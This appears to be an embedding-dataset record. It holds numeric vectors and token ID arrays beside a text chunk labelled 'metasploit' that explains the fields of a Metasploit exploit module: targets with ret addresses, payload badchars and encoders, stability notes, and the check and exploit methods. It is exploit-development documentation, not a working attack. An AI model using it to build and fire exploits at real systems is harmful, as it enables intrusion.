-0.02970827743411064, 0.5053619742393494, -0.634544312953949, 0.016950787976384163, 0.18623608350753784, -0.7303212285041809, 0.5232266783714294, -0.3753926753997803, 0.46733906865119934, 0.08599694073200226, -0.06493016332387924, -0.5545901656150818, -0.1317354440689087, 0.23259641230106354, -0.04001694172620773, 1.111343264579773, -0.06702029705047607, 0.09795715659856796, -0.07978671789169312, 0.5889700651168823, -0.6514435410499573, -0.19203369319438934, -0.724271297454834, -1.1151785850524902, 0.17910251021385193, 0.14184994995594025, 0.28042441606521606, -0.10696544498205185, -0.672537624835968, -0.20652097463607788, 0.8313280940055847, -0.0013067916734144092, -0.042768679559230804, -0.12619082629680634, 0.3536081910133362, -0.1391090601682663 ]
[ 8299, 5227, 2478, 8299, 20464, 11638, 1012, 2065, 2017, 1521, 2128, 4699, 1999, 16602, 18077, 3015, 1010, 5791, 4638, 2041, 1024, 2129, 2000, 4339, 1037, 16602, 18077, 2478, 16602, 10288, 24759, 28100, 8043, 6299, 1010, 4385, 1012, 2021, 1997, 2607, 1010, 2000, 4088, 1010, 2017, 2087, 3497, 2342, 1037, 23561, 2000, 2147, 2007, 1010, 1998, 2182, 2009, 2003, 1012, 2057, 1521, 2222, 2036, 4863, 2129, 2000, 6039, 2041, 1996, 3223, 4249, 1024, 1001, 1001, 1001, 2023, 11336, 5942, 18804, 13102, 4135, 4183, 1024, 24471, 2140, 1001, 2783, 3120, 1024, 24471, 2140, 1001, 1001, 2465, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1026, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 4635, 1027, 3671, 26763, 2075, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 1031, 21431, 1033, 1031, 4007, 1033, 1031, 7117, 3426, 1033, 1031, 18130, 2828, 1033, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 2360, 2242, 2008, 1996, 5310, 2453, 2342, 2000, 2113, 1065, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 2171, 1005, 1033, 1010, 1005, 7604, 1005, 1027, 1028, 1031, 1031, 1005, 24471, 2140, 1005, 1010, 1005, 1005, 1033, 1033, 1010, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 1010, 1005, 7889, 1005, 1027, 1028, 1031, 1031, 1005, 2291, 2030, 4007, 2544, 1005, 1010, 1063, 1005, 2128, 2102, 1005, 1027, 1028, 1014, 2595, 23632, 23632, 23632, 23632, 1001, 2023, 2097, 2022, 2800, 1999, 1036, 4539, 1012, 2128, 2102, 1036, 1065, 1033, 1033, 1010, 1005, 18093, 1005, 1027, 1028, 1063, 1005, 2919, 7507, 2869, 1005, 1027, 1028, 1000, 1032, 1060, 8889, 1000, 1065, 1010, 1005, 21598, 1005, 1027, 1028, 6270, 1010, 1005, 19380, 13701, 1005, 1027, 1028, 1005, 1005, 1010, 1005, 12398, 7559, 18150, 1005, 1027, 1028, 1014, 1010, 1005, 3964, 1005, 1027, 1028, 1063, 1005, 9211, 1005, 1027, 1028, 1031, 5823, 1035, 3647, 1033, 1010, 1005, 15258, 1005, 1027, 1028, 1031, 9377, 3085, 1035, 5219, 1033, 1010, 1005, 2217, 12879, 25969, 2015, 1005, 1027, 1028, 1031, 10471, 1035, 2006, 1035, 9785, 1010, 25941, 1035, 1999, 1035, 15664, 1033, 1065, 1010, 1007, 1007, 2203, 13366, 4638, 1001, 2005, 1996, 4638, 3094, 2203, 13366, 18077, 1001, 2364, 3853, 2203, 2203, 2171, 1011, 1996, 2171, 2492, 2323, 4088, 2007, 1996, 2171, 1997, 1996, 21431, 1010, 2628, 2011, 1996, 4007, 1012, 28946, 1010, 1996, 1523, 7117, 3426, 1524, 2492, 2965, 2029, 6922, 2030, 3853, 1996, 11829, 2003, 2179, 1012, 1998, 2633, 1010, 1996, 2828, 1997, 18130, 1996, 11336, 2003, 18077, 2075, 1012, 6412, 1011, 1996, 6412, 2492, 2323, 4863, 2054, 1996, 11336, 2515, 1010, 2477, 2000, 3422, 2041, 2005, 1010, 3563, 5918, 1010, 1996, 2062, 1010, 1996, 2488, 1012, 1996, 3125, 2003, 2000, 2292, 1996, 5310, 3305, 2054, 2002, 1521, 1055, 2478, 2302, 1996, 2342, 2000, 2941, 3191, 1996, 11336, 1521, 1055, 3120, 1998, 3275, 2477, 2041, 1012, 1998, 3404, 2033, 1010, 2087, 1997, 2068, 2123, 1521, 1056, 1012, 3166, 2492, 2003, 2073, 2017, 2404, 2115, 2171, 1012, 1996, 4289, 2323, 2022, 1523, 2171, 1523, 1012 ]
metasploit
113.txt
2
if you want to have your twitter handle there, leave it as a comment, for example : β€œ name # handle ” references - the references field is an array of references related to the vulnerability or the exploit. for example, an advisory, a blog post, etc. make sure you use known reference identifiers – see module reference identifiers for a list. platform - the platform field indicates what platforms are supported, for example : win, linux, osx, unix, bsd. targets - the targets field is an array of systems, applications, setups, or specific versions your exploit is targeting. the second element or each target array is where you store specific metadata about that target, for example, a specific offset, a gadget, a ret address, etc. when a target is selected by the user, the metadata is loaded and tracked by a β€œ target index ”, and can be retrieved by using the target method. payloads - the payloads field specifies how the payload should be encoded and generated. you can specify : space, saveregisters, prepend, prependencoder, badchars, append, appendencoder, maxnops, minnops, encoder, nop, encodertype, encoderoptions, extendedoptions, encoderdontfallthrough. disclosuredate - the disclosuredate is about when the vulnerability was disclosed in public, in the format of : β€œ m d y ”. for example : β€œ apr 04 2014 ” notes - the notes field is a hash always containing three keys. the value of each key is an array of constants. the list of available constants can be found in the definition of module reliability side effects and stability. the key should be present even if the array is empty. stability - the stability field describes how the exploit affects the system it ’ s being run on, ex : crash _ safe, crash _ os _ downreliability - the reliability field describes how reliable the session is that gets returned by the exploit, ex : repeatable _ session, unreliable _ sessionsideeffects - the sideeffects field describes the side effects cause by the exploit that the user should be aware of, ex : artifacts _ on _ disk, ioc _ in _ logs, account _ lockouts. your exploit should also have a check method to support the check command, but this is optional in case it ’ s not possible. and finally, the exploit method is like your
[ -0.20061656832695007, -0.4609730839729309, 0.37604719400405884, 0.23885172605514526, -0.39527755975723267, -0.32710498571395874, 0.23665322363376617, -0.17814607918262482, 0.22825153172016144, 0.41487351059913635, 0.25235143303871155, -0.2985565960407257, 0.11563155800104141, -0.7009854316711426, -0.2249235212802887, -0.17533603310585022, -0.1493673473596573, 0.187871515750885, -1.1117147207260132, -0.14939355850219727, 0.5234097242355347, 0.5456315279006958, -0.847200334072113, -0.0069444566033780575, -0.13248243927955627, 0.2646443545818329, 0.8922476768493652, -0.03437002748250961, 0.4910854399204254, 0.8056254386901855, 0.7698270678520203, -0.10607846826314926, -0.38631367683410645, -0.3297707140445709, 0.29536905884742737, -0.10564153641462326, 0.48500490188598633, -0.5509956479072571, 0.34743279218673706, -0.7975549697875977, 0.7077678442001343, -0.533897340297699, -0.7889105081558228, -0.2930809259414673, 0.0836731567978859, 0.08891772478818893, -0.06007741019129753, -0.2584354281425476, 0.8381299376487732, -0.9529568552970886, 0.5278419256210327, -0.2679601311683655, 0.1165657714009285, 0.42632296681404114, 0.5858148336410522, 0.1366199254989624, -0.026299268007278442, 0.10340534895658493, 0.20438718795776367, -0.052315279841423035, -0.29954710602760315, 0.0021254816092550755, 0.010438633151352406, -0.6685947775840759, -0.523057758808136, 0.09915630519390106, -0.07749020308256149, -0.2640635073184967, -0.16126129031181335, -0.4017942547798157, -0.6084723472595215, 0.5790461301803589, -0.6588872671127319, -0.36718589067459106, -0.9079340100288391, -0.1500546634197235, 0.5834037065505981, -0.06363380700349808, -0.2802313268184662, 0.6490169763565063, 0.09136346727609634, 0.6574149131774902, -0.22573550045490265, -0.0639980360865593, 0.23101632297039032, -0.5229400396347046, 0.49727529287338257, 0.5188106894493103, -0.3943482041358948, 0.24475345015525818, 0.6949796676635742, 0.19454176723957062, -0.4931468069553375, -0.10130911320447922, 0.29260575771331787, 0.23293310403823853, -0.34406545758247375, 0.30942094326019287, 0.21711482107639313, 0.04995282366871834, 0.3403312861919403, 0.4520077109336853, 0.26893332600593567, 0.492869108915329, -0.3953421115875244, 0.642539918422699, 0.4996449053287506, -0.36081236600875854, 0.004843536764383316, -0.12303284555673599, 0.5890781283378601, 0.45243120193481445, -0.23519998788833618, -0.9264827966690063, -0.40143340826034546, 0.1379229575395584, 0.6524694561958313, -0.1371629387140274, -0.04596481844782829, 1.020376205444336, -0.5676567554473877, -0.6079095602035522, -0.16980214416980743, 0.39345064759254456, -0.23956501483917236, 0.3364066183567047, 0.07056571543216705, 0.9229822158813477, -0.699498176574707, -0.19629496335983276, -0.10370688140392303, 0.1662670075893402, 0.09300781786441803, 0.7138583064079285, -0.4605807065963745, 0.43501392006874084, -0.08856967091560364, 0.23974668979644775, 0.5262903571128845, -0.8542388677597046, -0.29641929268836975, -0.258367121219635, 0.4381798505783081, 0.9453867673873901, 0.25120988488197327, 0.033948399126529694, 0.614895761013031, -0.09364025294780731, -0.1318264752626419, 0.4254445731639862, -0.031274523586034775, -0.26467129588127136, 0.4754861295223236, -0.48133352398872375, -0.5976294875144958, 0.40868034958839417, 0.03807784244418144, 0.09087847918272018, -0.1167408749461174, 0.08517806977033615, 0.21616224944591522, 0.9027488231658936, 0.46696433424949646, 0.36085280776023865, -0.5476679801940918, 0.4201345145702362, -0.23108038306236267, -0.620630145072937, -0.4371885359287262, -0.09430816024541855, 0.3323477804660797, 0.41987523436546326, -0.09758684784173965, 0.3318606913089752, 1.5285195112228394, 0.3631885051727295, -0.5798673033714294, -0.21072596311569214, 0.36170583963394165, 0.2504976987838745, -0.6439746618270874, 0.3601457178592682, 0.2646634578704834, 0.467507928609848, -0.4027141034603119, 0.2193751037120819, -0.2916560769081116, -0.6261153817176819, -0.2464047521352768, -0.15092039108276367, -0.43726271390914917, 0.84880131483078, -0.0030066436156630516, 0.24677546322345734, 1.0138003826141357, -0.09442401677370071, -1.408829927444458, 0.12309781461954117, -0.083739273250103, -1.3887790441513062, -0.5053007006645203, -0.3728591203689575, -0.2428199201822281, 0.6520854234695435, -1.0932121276855469, -0.05981495976448059, 0.7794913649559021, 0.7045336365699768, -0.3795727789402008, 1.029449701309204, 0.5709946751594543, -0.5443968772888184, -0.3306993842124939, 0.24842475354671478, -0.10910031199455261, -0.22264394164085388, -0.23057346045970917, 0.6555753350257874, -0.14129498600959778, 0.34157586097717285, -0.3837069272994995, 0.933470606803894, 0.13652408123016357, 0.4483707547187805, 0.37094148993492126, -0.5435210466384888, -0.09560608118772507, -0.3903427720069885, -0.7068608403205872, -0.26046043634414673, -0.3311264216899872, 0.3730088174343109, 0.2994919419288635, 0.6612105965614319, 0.13814455270767212, -0.7342095971107483, 0.3669583797454834, 0.03260565921664238, 0.37957707047462463, 0.38318222761154175, 0.48136448860168457, 0.8304857611656189, 0.0379161462187767, 0.5084518194198608, 0.6197574734687805, 0.49565187096595764, 0.46997272968292236, 0.1155138611793518, 0.09652461111545563, 0.6328078508377075, -0.14203710854053497, 0.7309806942939758, 0.37232881784439087, -0.25641417503356934, -0.6977089047431946, -1.2176406383514404, -0.11277633160352707, 0.811490535736084, -1.2318536043167114, -0.8984749913215637, -0.03763622045516968, -0.3853777050971985, 0.10367666184902191, -0.7966233491897583, 0.2827422320842743, 0.5359470248222351, -0.6703935861587524, 0.465229868888855, -0.16152510046958923, -0.737504780292511, -0.6378081440925598, -0.4505815804004669, -0.6484547853469849, -0.659301221370697, -0.7156722545623779, -0.4278627634048462, 0.1549040824174881, -0.07126122713088989, 0.83758145570755, -0.7857261896133423, -1.067488670349121, 0.7635243535041809, 0.31365859508514404, 0.30224868655204773, -0.14321227371692657, -0.007322813384234905, -0.8427125215530396, -0.05663689598441124, 0.2274710237979889, 1.051642656326294, 0.13794566690921783, -0.8274146318435669, -0.2488592267036438, -0.1533198356628418, -0.08628033101558685, 0.3964028060436249, 0.8209390044212341, 0.45488083362579346, 0.5495562553405762, -0.2694222927093506, -0.4179202616214752, -0.2655186951160431, 0.29571452736854553, -0.3324054479598999, -0.3092537224292755, 0.4317896366119385, -0.6131873726844788, -0.1430308073759079, 0.21618753671646118, 0.4170316457748413, -0.5799135565757751, 0.7013962268829346, -0.5252640843391418, 0.5216650366783142, -0.4505688548088074, 0.42291349172592163, 0.24124692380428314, -0.004066296853125095, 0.10279002785682678, -0.14906363189220428, -0.05836021527647972, -0.31056123971939087, -0.1544080525636673, -0.7551679611206055, 0.09154145419597626, 0.18175189197063446, -0.03364125266671181, -0.5797551870346069, 0.5309523344039917, -0.325155109167099, -0.5811411738395691, 0.2865069508552551, -0.0469694547355175, 0.7966414093971252, -0.05869858339428902, -0.11661823838949203, -0.2595936357975006, -0.5065112113952637, 0.20602017641067505, 0.041896235197782516, 0.5121810436248779, -0.680038571357727, 0.1140342652797699, 0.5092113018035889, 0.08480369299650192, 0.8109456896781921, -0.00023924924607854337, -0.5245402455329895, -0.36170315742492676, 0.26618343591690063, -0.45129239559173584, 0.1568598598241806, 0.44779708981513977, 0.8321741223335266, 0.26711633801460266, 1.0527838468551636, -0.18246765434741974, -0.25843697786331177, 0.1723116785287857, 0.3968750834465027, 0.04912503808736801, 0.038161855190992355, 0.0726524069905281, -0.051626987755298615, -0.25311264395713806, -0.41184133291244507, -0.31867679953575134, 0.319609135389328, 0.30909398198127747, 0.064097560942173, 0.5759581923484802, -0.09226926416158676, 0.4829288423061371, 0.6457815170288086, -0.39200976490974426, -0.7089531421661377, 0.3968263864517212, -0.3755813241004944, 1.093268871307373, -0.15769964456558228, -0.06224394589662552, 0.4422481060028076, 0.7880194187164307, 0.09480342268943787, 0.3057323694229126, -0.1437673568725586, -0.619969367980957, -0.7956026792526245, -0.2189592719078064, 0.1785508096218109, -0.3905910551548004, -0.1535373479127884, 0.39555788040161133, -0.5360167026519775, -0.4897424876689911, -0.5563905239105225, 0.5021865367889404, 0.9015409350395203, 0.01426691934466362, 0.6210872530937195, 0.30393075942993164, 0.44849973917007446, -0.41037270426750183, 0.28959015011787415, -0.18721240758895874, 0.010102244094014168, -0.1451231837272644, 0.6506624817848206, -0.5197416543960571, 0.2228812277317047, 0.4057666063308716, 0.10384143888950348, -0.0577642023563385, -0.322038859128952, -0.29690641164779663, 0.3161561191082001, 0.11932509392499924, -0.17023956775665283, 0.3319454491138458, 0.14993292093276978, -0.2513185143470764, -0.16217054426670074, -0.9225777387619019, 0.6835455298423767, 0.680624783039093, -0.6609054207801819, -0.5080050230026245, -0.7588019967079163, -0.23314669728279114, 0.24161535501480103, 0.45552095770835876, 0.16490043699741364, -0.5243299007415771, -0.27145683765411377, -0.5722763538360596, -0.043680787086486816, 0.5326064825057983, 0.217509463429451, 0.09399360418319702, -1.0681949853897095, 0.045261312276124954, 0.4332035779953003, -0.5993369221687317, -0.8841702342033386, 0.3330671787261963, 0.04740302264690399, 0.38671910762786865, 0.32095375657081604, -0.5755681395530701, -0.0023835645988583565, 0.2213088870048523, -0.8342475891113281, 0.13030576705932617, -0.692850649356842, 0.3911489248275757, 0.24604901671409607, 0.4734586179256439, -0.47782790660858154, 0.08607953786849976, -0.7044650316238403, 0.29755479097366333, -0.4780685603618622, -0.2550576627254486, -0.10315978527069092, 0.11160868406295776, 0.9134950041770935, 0.29765060544013977, -0.4339068830013275, 0.5432648658752441, 0.25463128089904785, -0.21061064302921295, 0.16789336502552032, -0.5230818390846252, -0.44898900389671326, 0.6124340295791626, -0.3658555746078491, 0.3273157477378845, -0.0227411650121212, -0.07450205087661743, -0.05866117775440216, -0.40117600560188293, 0.5564161539077759, -0.00780135951936245, -0.03248129412531853, -0.8632354140281677, -0.1550060659646988, 0.24735350906848907, 0.4503096640110016, -0.5753964185714722, 0.1380312591791153, -0.6719891428947449, -0.3091201186180115, -0.2821383774280548, 0.22803841531276703, -0.8502081036567688, -0.550976037979126, -0.7290953993797302, 0.034757837653160095, -0.46635735034942627, -0.10690484195947647, 0.5296897888183594, 0.3415428400039673, -0.04101652279496193, 0.44326725602149963, 0.4279983341693878, 0.24101027846336365, -0.9204351902008057, -0.40574413537979126, -0.20268216729164124, 0.3262418806552887, -0.5340862274169922, 0.21349048614501953, -0.4037982225418091, 0.8838388323783875, -0.11396663635969162, 0.19322800636291504, 0.7132542729377747, -0.4232899844646454, -0.5881901383399963, 0.0930885598063469, 0.027549399062991142, -0.48323628306388855, -0.23620812594890594, 0.10619402676820755, -0.44479110836982727, -0.19066742062568665, -0.2719186842441559, -0.3264106214046478, -0.4545312225818634, -0.25398871302604675, -0.3330724537372589, -0.6031509637832642, 0.1698455959558487, -0.3573247194290161, -0.44327038526535034, -0.09443175792694092, 0.32541167736053467, 0.23734688758850098, -0.9655733704566956, -0.2202361524105072, 0.05678408220410347, -0.31936514377593994, 0.33480262756347656, 0.05024007335305214, -0.1403948813676834, -1.0699366331100464, -0.5305593013763428, 1.1822854280471802, -0.08367612957954407, -0.3573162257671356, 0.4213361442089081, -0.2513808012008667, 0.916853666305542, 0.17628583312034607, -0.33128419518470764, -0.30416780710220337, 0.21453048288822174, -0.05182117968797684, 0.09772226214408875, 0.3460949659347534, -0.35576027631759644, 0.6557629108428955, -0.15641777217388153, 0.07445667684078217, 0.10716736316680908, -0.10681948065757751, 0.2178497016429901, -0.0013784096809104085, 0.23923969268798828, -0.5754358768463135, -0.1777494251728058, -0.25851354002952576, 0.3086317181587219, -0.2264847308397293, -0.46917441487312317, -0.5793092250823975, -0.43430617451667786, -1.0042861700057983, -1.1910310983657837, 0.4653497636318207, -0.4042065441608429, 0.039218563586473465, 0.5371305346488953, -0.6787309050559998, 0.6447052359580994, -0.7118359208106995, 0.12598730623722076, 0.8319718837738037, 0.6318334341049194, 0.6539477705955505, -0.30469468235969543, 0.4530612826347351, 0.1707931011915207, 0.1813851147890091, 0.85857754945755, -0.14104998111724854, 0.19268618524074554, -0.1299884021282196, -0.41635802388191223, 0.28963297605514526, -0.41514796018600464, -0.41477811336517334, 0.7693750262260437, -0.3483680784702301, 0.8284556269645691, -0.09511204063892365, -0.27414608001708984, -0.17821337282657623, 0.24043403565883636, 0.48103997111320496, -0.06155488267540932, 0.5160913467407227, 0.3145339787006378, -0.18143531680107117, -0.5744855999946594, 0.2663465142250061, -0.18321754038333893, -0.23528753221035004, 0.28832510113716125, 0.9773432612419128, -0.37590304017066956, 0.8862584233283997, -0.14506584405899048, -0.5288977026939392, -0.22381755709648132, -0.7901781797409058, -0.4228722155094147, -0.10940833389759064, -0.46345698833465576, -0.5593849420547485, 0.19154387712478638, -0.22283805906772614, 0.24315080046653748, 0.41227900981903076, -0.10336223244667053, -0.4506516456604004, -0.8172851800918579, -0.058820948004722595, -0.0121925612911582, 0.6288654804229736, 0.9098424315452576, -0.6808620691299438, -0.08716414868831635, -0.3093854486942291, 0.08207325637340546, 0.18782180547714233, -0.21747910976409912, 1.0498204231262207, -0.3268657326698303, -0.04118454083800316, -0.23286348581314087, 0.49880555272102356, 0.10932740569114685, -0.6262468695640564, 0.25073641538619995, 0.9589470624923706, 0.19204069674015045, -0.7836647033691406, -0.7299054265022278, -0.02032194286584854, -0.3032686114311218, 0.6829022765159607, -0.22687819600105286, 0.20217257738113403, -0.20656083524227142, -0.008350959978997707, -0.5120322704315186, -0.6983431577682495, -0.8160697221755981, -0.8700233101844788, -0.03614821285009384, 0.22707755863666534, -0.18135447800159454, 0.3665035665035248, 0.48685479164123535, -0.576952338218689, -0.4414210319519043, -0.6050950884819031, 0.6551250219345093, -0.25242364406585693, 0.6192170977592468, 0.13782896101474762, 0.5475892424583435, -0.4256994426250458, -0.3090378940105438, -0.5131880044937134, -0.2186688929796219, -0.3341010808944702, -0.6396830677986145, 0.3024597465991974, 0.3757678270339966, -0.6812539100646973, 0.29288244247436523, 0.2045823484659195, -0.06008788198232651, -0.2603028416633606, -0.7619650959968567, 0.19327011704444885, 0.7433028817176819, -0.6618921160697937, 0.4239917993545532, -0.4650918245315552, 0.2488364577293396, 0.15468738973140717, -0.46344834566116333, 0.38331863284111023, -0.0036212715785950422, 0.1997402161359787, 0.4157549738883972, 0.07408328354358673, -0.630354642868042, 0.0035746933426707983, -0.15469340980052948, -0.8949889540672302, 0.012048530392348766, -0.6598589420318604, 0.39817288517951965, -0.327086478471756, -0.8683222532272339, 0.2580268979072571, 0.6305400133132935, 0.3249930739402771, 0.12501230835914612, -0.907220721244812, 0.6096751093864441, 0.6512600779533386, 0.3345228433609009, -0.4049225449562073, 0.5783424377441406, 0.18692927062511444, 0.185918927192688, 0.08363508433103561, 0.3568251132965088, -1.030046820640564, 0.09751129895448685, 0.20664501190185547, 0.11616760492324829, -0.33507615327835083, 0.05188524350523949, 0.02258247882127762, 0.5809982419013977, 0.25710785388946533, -0.02540401555597782, 0.43626531958580017, -0.5113967061042786, -0.5184847116470337, -0.31915274262428284, -0.8531707525253296, 0.23232011497020721, 0.12331360578536987, -0.24271738529205322, 0.12266144901514053, -0.029616400599479675, -0.13538137078285217, -0.5346574187278748, -0.26918742060661316, 0.20588542520999908, 0.5747649073600769, -0.3061351776123047, -0.40213915705680847, 0.627326488494873, -0.4307948052883148, -0.8367151021957397, -0.2524730861186981, -0.0246451236307621, -0.7453181147575378, -0.7874401807785034, 0.07297252118587494, 0.8430073261260986, -0.15280453860759735, 0.15669137239456177, -0.4947430193424225, 0.478986531496048, 0.648613452911377, -0.09623687714338303, 0.4748803675174713, -0.11398224532604218, -0.9478416442871094, 0.23540303111076355, -0.4198646545410156, 0.22833865880966187, 0.18103493750095367, 0.02058575302362442, 0.38215386867523193, 0.4418336749076843, -0.6822556257247925, 0.2573181092739105, 0.04137943312525749, 0.7092503309249878, 0.5339406728744507, 0.5643378496170044, 0.14563339948654175, -0.7555480599403381, -0.1538313627243042, -0.5907220840454102, 0.04450343921780586, 0.09992367029190063, 0.4723133146762848, -0.0867842361330986, 0.4172258973121643, 0.409975528717041, -0.765133798122406, -0.2558242678642273, 0.1888674646615982, -0.2946805953979492, 0.032834626734256744, 0.8336427807807922, -0.36502692103385925, -0.06615829467773438, 0.23886726796627045, -0.06234810873866081, 0.6063133478164673, -0.1843903660774231, 0.2543964684009552, -0.10181515663862228, -0.19116923213005066, 0.6308801770210266, -0.28156593441963196, 0.2914564311504364, -0.40490439534187317, 0.13610045611858368, 0.10749485343694687, -0.046417348086833954, -0.7954443693161011, 0.6009009480476379, 1.206699252128601, 0.108897864818573, -0.2885363698005676, 0.3628804385662079, -0.2796482741832733, 0.4105300009250641, 0.37156227231025696, -0.06838768720626831, -0.7037351727485657, 0.5243822336196899, 0.1258419305086136, -0.5578301548957825, -0.529253363609314, 0.11973412334918976, 0.25208780169487, 0.6941735148429871, 0.24452364444732666, -0.2816120982170105, 0.17033937573432922, -0.1279054582118988, 0.7221027612686157, 0.32137370109558105, 0.0917593315243721, -0.1262572705745697, -0.9826362133026123, -0.919274091720581, 0.38459649682044983, -0.19623471796512604, 0.9188508987426758, 0.07119765877723694, 0.7583099007606506, 0.2564391791820526, 0.5182589292526245, -0.18808725476264954, -0.20346951484680176, -0.3350227177143097, 0.016684314236044884, 0.011503608897328377, -0.0940973162651062, 0.02904190495610237, -0.34387680888175964, 0.6133586764335632, 0.3309051990509033, 0.056409504264593124, -0.7459046244621277, 0.02551429532468319, -0.15764199197292328, -0.6745033264160156, 0.7278839945793152, -0.054055605083703995, -0.6892394423484802, -0.27764493227005005, 0.2604962885379791, -0.09438436478376389, 0.3223360776901245, -0.10340240597724915, -0.5462839603424072, -0.49774906039237976, -0.18612654507160187, -0.21801015734672546, 0.5934247374534607, 0.09055028110742569, -0.8553179502487183, 0.27324378490448, -0.7252878546714783, -0.1969565898180008, 0.3824007213115692, -0.5833856463432312, -0.4785425364971161, 0.7334755063056946, -0.2937062978744507, 0.40767717361450195, 0.12547160685062408, 0.13776586949825287, -0.015378573909401894, -0.12142539769411087, 0.9260560274124146, -0.46069955825805664, 0.5356299877166748, 0.000020818459233851172, 0.2554284334182739, 0.33688169717788696, -0.5317747592926025, 0.19028684496879578, -0.2746119201183319, -0.14182940125465393, -0.49171119928359985, -0.28769421577453613, -0.6566100716590881, -0.274771511554718, 0.4261840581893921, 0.21877259016036987, 0.4996057152748108, -0.028552725911140442, -0.7140951156616211, -0.20151910185813904, -0.504250705242157, 0.4658491909503937, -0.1619977504014969, 0.1679554283618927, 0.2701917290687561, 0.33698201179504395, 1.328659176826477, -1.0003881454467773, 4.492564678192139, 0.4313269257545471, -0.2306762933731079, -0.007796763442456722, 0.17689518630504608, 0.39876464009284973, 1.466546893119812, -0.14994432032108307, 0.4326860308647156, -0.30243104696273804, 0.09460616856813431, -0.1994897723197937, -0.028933551162481308, 0.9678817391395569, 0.9994849562644958, 0.38975608348846436, -0.27419528365135193, 0.04935464262962341, 0.22842326760292053, -0.6462608575820923, -0.8059334754943848, -0.17649443447589874, -0.20783832669258118, 0.7898277640342712, 0.3944603204727173, 0.21527345478534698, -0.3871886730194092, -0.5655912756919861, -0.06285528838634491, 0.40050727128982544, -0.2109779417514801, -0.5292361378669739, 0.4050937294960022, -0.3374407887458801, -0.7187172770500183, -0.5307357311248779, 0.31631264090538025, -0.36790046095848083, -0.6798768639564514, -0.40180110931396484, 0.4171522557735443, -0.04370842128992081, -0.2834952473640442, -0.33957284688949585, -0.10261239856481552, 0.8944799304008484, -0.5099253058433533, 0.5567450523376465, 0.7702628970146179, -0.6105096936225891, 0.4666333496570587, 0.07784856855869293, 1.1608502864837646, -0.030049307271838188, -0.18456381559371948, 0.4419476389884949, -0.05069549381732941, -0.48609039187431335, 0.18589912354946136, -0.18090784549713135, 0.8693817257881165, -0.4228106737136841, 0.23162224888801575, -0.35207462310791016, -0.11277555674314499, 0.5561761856079102, -0.3334518373012543, 0.40810340642929077, 0.0199363324791193, -0.4826410114765167, 0.010400386527180672, -0.0468507818877697, -0.6042121052742004, -0.5009045600891113, 0.892721951007843, -0.3197263479232788, -0.4005800187587738, -0.0471588633954525, 0.13381922245025635, -0.2470175325870514, -0.618829607963562, -0.8154110312461853, -1.2338835000991821, 0.31574249267578125, 0.4235650897026062, 0.38529956340789795, 0.24363893270492554, -0.8406211733818054, 0.10151585191488266, 0.0655684769153595, 0.10119356960058212, 0.6024115681648254, 0.1535615175962448, 0.9576436281204224, 0.07581798732280731 ]
[ 2065, 2017, 2215, 2000, 2031, 2115, 10474, 5047, 2045, 1010, 2681, 2009, 2004, 1037, 7615, 1010, 2005, 2742, 1024, 1523, 2171, 1001, 5047, 1524, 7604, 1011, 1996, 7604, 2492, 2003, 2019, 9140, 1997, 7604, 3141, 2000, 1996, 18130, 2030, 1996, 18077, 1012, 2005, 2742, 1010, 2019, 7319, 1010, 1037, 9927, 2695, 1010, 4385, 1012, 2191, 2469, 2017, 2224, 2124, 4431, 8909, 4765, 28295, 1516, 2156, 11336, 4431, 8909, 4765, 28295, 2005, 1037, 2862, 1012, 4132, 1011, 1996, 4132, 2492, 7127, 2054, 7248, 2024, 3569, 1010, 2005, 2742, 1024, 2663, 1010, 11603, 1010, 9808, 2595, 1010, 19998, 1010, 18667, 2094, 1012, 7889, 1011, 1996, 7889, 2492, 2003, 2019, 9140, 1997, 3001, 1010, 5097, 1010, 16437, 2015, 1010, 2030, 3563, 4617, 2115, 18077, 2003, 14126, 1012, 1996, 2117, 5783, 2030, 2169, 4539, 9140, 2003, 2073, 2017, 3573, 3563, 27425, 2055, 2008, 4539, 1010, 2005, 2742, 1010, 1037, 3563, 16396, 1010, 1037, 11721, 24291, 1010, 1037, 2128, 2102, 4769, 1010, 4385, 1012, 2043, 1037, 4539, 2003, 3479, 2011, 1996, 5310, 1010, 1996, 27425, 2003, 8209, 1998, 12808, 2011, 1037, 1523, 4539, 5950, 1524, 1010, 1998, 2064, 2022, 5140, 2011, 2478, 1996, 4539, 4118, 1012, 18093, 2015, 1011, 1996, 18093, 2015, 2492, 27171, 2129, 1996, 18093, 2323, 2022, 12359, 1998, 7013, 1012, 2017, 2064, 20648, 1024, 2686, 1010, 3828, 2890, 24063, 2545, 1010, 17463, 10497, 1010, 17463, 10497, 2368, 16044, 2099, 1010, 2919, 7507, 2869, 1010, 10439, 10497, 1010, 10439, 10497, 2368, 16044, 2099, 1010, 4098, 3630, 4523, 1010, 8117, 3630, 4523, 1010, 4372, 16044, 2099, 1010, 2053, 2361, 1010, 4372, 16044, 5339, 18863, 1010, 4372, 16044, 18981, 9285, 1010, 3668, 7361, 9285, 1010, 4372, 16044, 28176, 24475, 8095, 2705, 22494, 5603, 1012, 19380, 13701, 1011, 1996, 19380, 13701, 2003, 2055, 2043, 1996, 18130, 2001, 21362, 1999, 2270, 1010, 1999, 1996, 4289, 1997, 1024, 1523, 1049, 1040, 1061, 1524, 1012, 2005, 2742, 1024, 1523, 19804, 5840, 2297, 1524, 3964, 1011, 1996, 3964, 2492, 2003, 1037, 23325, 2467, 4820, 2093, 6309, 1012, 1996, 3643, 1997, 2169, 3145, 2003, 2019, 9140, 1997, 5377, 2015, 1012, 1996, 2862, 1997, 2800, 5377, 2015, 2064, 2022, 2179, 1999, 1996, 6210, 1997, 11336, 15258, 2217, 3896, 1998, 9211, 1012, 1996, 3145, 2323, 2022, 2556, 2130, 2065, 1996, 9140, 2003, 4064, 1012, 9211, 1011, 1996, 9211, 2492, 5577, 2129, 1996, 18077, 13531, 1996, 2291, 2009, 1521, 1055, 2108, 2448, 2006, 1010, 4654, 1024, 5823, 1035, 3647, 1010, 5823, 1035, 9808, 1035, 2091, 16570, 2401, 8553, 1011, 1996, 15258, 2492, 5577, 2129, 10539, 1996, 5219, 2003, 2008, 4152, 2513, 2011, 1996, 